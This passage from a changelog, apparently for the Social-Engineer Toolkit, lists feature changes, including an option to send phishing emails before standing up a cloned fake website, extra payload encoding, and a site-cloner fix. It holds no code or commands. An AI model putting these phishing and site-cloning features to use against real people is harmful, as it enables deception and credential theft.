select interface, handy if ettercap can't determine interface to use, simply change the set_config flag option ETTERCAP_INTERFACE=NONE to ETTERCAP_INTERFACE=wlan0 or whatever. * Added some fun menus when you log into SET that rotate to different ASCII art * Added some coloring into SET, more on this to come, this is only the beginning * Added the option in config/set_config WEBATTACK_EMAIL=OFF you can send emails first then setup the fake website to help with phishing, doesn't require a payload now * Added 4 count on encoding instead of 3 for web attack and payloadgen * Removed the need for xterm on web attack and rely off of pexpect now, this allows you to run set from a 1 console type deal, plus there was a lot of people having issues with xterm in general. * Fixed a bug with cloner that would not clone sites properly that use aspx as their homepage (thanks Emgent)